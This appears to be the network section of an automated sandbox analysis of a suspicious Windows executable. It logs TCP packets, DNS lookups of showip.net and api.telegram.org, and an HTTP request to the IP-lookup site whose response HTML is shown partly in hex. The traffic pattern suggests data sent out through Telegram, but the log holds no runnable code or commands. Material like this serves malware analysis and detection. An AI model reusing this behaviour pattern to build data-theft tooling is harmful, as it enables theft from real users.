Dec 3, 2024 14:29:15.153630018 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.183337927 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.184201002 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.184340000 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.184360027 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.184400082 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.184444904 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.184458017 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.184469938 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.231324911 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.235429049 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.235544920 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.235615015 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.235639095 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.235749006 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.235820055 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.247410059 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.267266035 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.267452002 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.268696070 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.268788099 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.268846035 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.268908024 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.268980980 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.278700113 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.311331987 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.312246084 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.312289000 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.312386990 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.312432051 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.312446117 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.312460899 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.312508106 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.325493097 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.359328032 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.360220909 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.360259056 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.372371912 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.388602018 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.388627052 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.388758898 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.388784885 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.389029026 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.389085054 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.389130116 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.389178038 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.389209986 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.403637886 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.435332060 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.436042070 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.436248064 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.436304092 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.450478077 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.483328104 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.507091045 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.507215023 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.507416964 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.507472992 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.507498026 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.510153055 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.510173082 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.510250092 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.510268927 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.510294914 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.510312080 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.520507097 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.524931908 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.524956942 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.524970055 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.524992943 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.525060892 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.525072098 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.525087118 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.525127888 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.525145054 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.525165081 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.544209003 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.552654028 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.552730083 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.552829981 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.552844048 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.556305885 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.556425095 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.556483984 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.556679010 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.575503111 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.599333048 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.632714987 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.632857084 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.632867098 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.632899046 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.632965088 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.632992029 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.633897066 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.633914948 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.634033918 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.634118080 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.634161949 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.634340048 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.634471893 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.641608000 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.641705990 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.641731977 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.641890049 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.641907930 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.642144918 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642271996 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642278910 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.642324924 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642360926 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642395020 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642437935 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642471075 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642503023 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642519951 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642529964 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642535925 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642616987 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.642656088 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.653588057 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.673952103 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.674057007 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.674216032 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674247980 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.674272060 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674493074 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674591064 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674696922 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674767017 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674796104 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674917936 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.674973011 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.675023079 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.675065041 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.684840918 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.719333887 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.752940893 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.753101110 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.753254890 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.753323078 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.753345013 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754025936 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.754107952 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754137039 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.754324913 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754338026 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.754401922 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754479885 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754537106 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754587889 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754684925 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754757881 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754798889 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.754837990 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755170107 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755189896 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755276918 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755283117 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755322933 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755330086 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755348921 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755352974 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755378962 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755428076 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755440950 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.755471945 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755572081 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755597115 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755641937 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755664110 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.755697966 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.756273031 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.756340981 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.756448030 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.756468058 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.756480932 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757474899 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.757589102 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757627010 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.757637024 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757644892 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757678032 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757759094 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757843018 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757901907 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.757967949 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.758047104 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.758080006 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.762763977 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.762898922 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763101101 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763155937 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763721943 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763761044 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763787031 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763813019 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763827085 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763870001 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763885975 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763896942 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763906956 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763911009 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763938904 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.763956070 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.763967991 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.764008999 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764017105 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.764048100 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764086008 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764095068 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764163017 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764216900 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764226913 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764261007 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764292955 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764719963 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.764775991 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.764822960 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764839888 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.764884949 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.764930964 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.765793085 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.765821934 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.765932083 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.765963078 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.765973091 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.768062115 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.768110037 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.768122911 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.795053005 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.795206070 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.795341969 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.795358896 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.795411110 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.795433998 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.798685074 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.843334913 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.844032049 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.844212055 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.844285011 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.844362020 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.872349024 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.872965097 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.873058081 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.876012087 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.876897097 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.877027035 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.877163887 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.877212048 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.877229929 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.877229929 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.877273083 CET	49962	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:15.879177094 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.880151033 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:15.882458925 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:17.408490896 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:17.408572912 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:17.408571959 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:17.408623934 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:17.409063101 CET	49959	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:17.409077883 CET	443	49959	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:17.598553896 CET	49971	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:17.598606110 CET	443	49971	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:17.598687887 CET	49971	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:17.599033117 CET	49971	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:17.599050999 CET	443	49971	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:19.010577917 CET	443	49971	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:19.012001038 CET	49971	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:29:19.060612917 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:19.060702085 CET	443	49962	149.154.167.220	192.168.2.5
Dec 3, 2024 14:29:19.060836077 CET	49962	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 14:27:29.952338934 CET	49551	53	192.168.2.5	1.1.1.1
Dec 3, 2024 14:27:30.297926903 CET	53	49551	1.1.1.1	192.168.2.5
Dec 3, 2024 14:27:38.101031065 CET	59832	53	192.168.2.5	1.1.1.1
Dec 3, 2024 14:27:38.347651958 CET	53	59832	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 14:27:29.952338934 CET	192.168.2.5	1.1.1.1	0x3bdb	Standard query (0)	showip.net	A (IP address)	IN (0x0001)	false
Dec 3, 2024 14:27:38.101031065 CET	192.168.2.5	1.1.1.1	0x6486	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 14:27:30.297926903 CET	1.1.1.1	192.168.2.5	0x3bdb	No error (0)	showip.net		162.55.60.2	A (IP address)	IN (0x0001)	false
Dec 3, 2024 14:27:38.347651958 CET	1.1.1.1	192.168.2.5	0x6486	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

showip.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	162.55.60.2	80	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 14:27:30.431108952 CET	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
Dec 3, 2024 14:27:31.708247900 CET	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Tue, 03 Dec 2024 13:27:31 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Dec 3, 2024 14:27:31.708287001 CET	1236	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;
Dec 3, 2024 14:27:31.708306074 CET	448	IN	Data Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
